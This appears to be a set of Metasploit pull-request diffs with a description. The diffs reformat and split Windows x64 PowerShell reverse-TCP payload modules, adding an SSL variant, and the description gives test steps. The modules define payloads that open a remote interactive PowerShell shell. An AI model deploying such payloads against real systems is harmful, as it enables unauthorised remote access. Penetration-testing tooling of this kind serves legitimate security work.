-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X64,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::PowerShell,
-      ))
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X64,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::PowerShell
+      )
+    )
 
     # Register command execution options
     register_options(
       [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
     # Hide the CMD option...this is kinda ugly
     deregister_options('CMD')
   end
@@ -45,6 +46,6 @@ module MetasploitModule
   # Override the exec command string
   #
   def powershell_command
-    generate_powershell_code("Reverse")
+    generate_powershell_code('Reverse')
   end
 end

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -32,14 +32,6 @@ module MetasploitModule
       )
     )
 
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
   end
 
   #

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -4,11 +4,6 @@
 ##
 require 'rex/powershell'
 
-###
-#
-# Extends the Exec payload to add a new user.
-#
-###
 module MetasploitModule
 
   CachedSize = :dynamic
@@ -28,12 +23,12 @@ module MetasploitModule
         ],
       'References'    =>
         [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X64,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::PowerShell,
       ))
 

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb
@@ -1,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'rex/powershell'
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Windows::Exec_x64
+  include Msf::Payload::Windows::Powershell
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP SSL',
+        'Description' => 'Listen for a connection and spawn an interactive powershell session over SSL',
+        'Author' => [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+        'References' => [
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X64,
+        'Handler' => Msf::Handler::ReverseTcpSsl,
+        'Session' => Msf::Sessions::PowerShell
+      )
+    )
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def powershell_command
+    generate_powershell_code('SSL')
+  end
+end

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb
@@ -31,15 +31,6 @@ module MetasploitModule
         'Session' => Msf::Sessions::PowerShell
       )
     )
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
   end
 
   #


### PR DESCRIPTION
Fix https://github.com/rapid7/metasploit-framework/issues/15804 by using the old style powershell syntax (New-Object).

## Verification

- [ ] Get a `cmd/windows/powershell_reverse_tcp` session on Windows Server 2012 and Windows 7
- [ ] **Verify** the file tests:
```
loadpath test/modules
use post/test/file
set SESSION -1
set VERBOSE true
```
- [ ] Get a `cmd/windows/powershell_reverse_tcp_ssl` session on Windows 10
- [ ] **Verify** the file tests:
```
loadpath test/modules
use post/test/file
set SESSION -1
set VERBOSE true
```
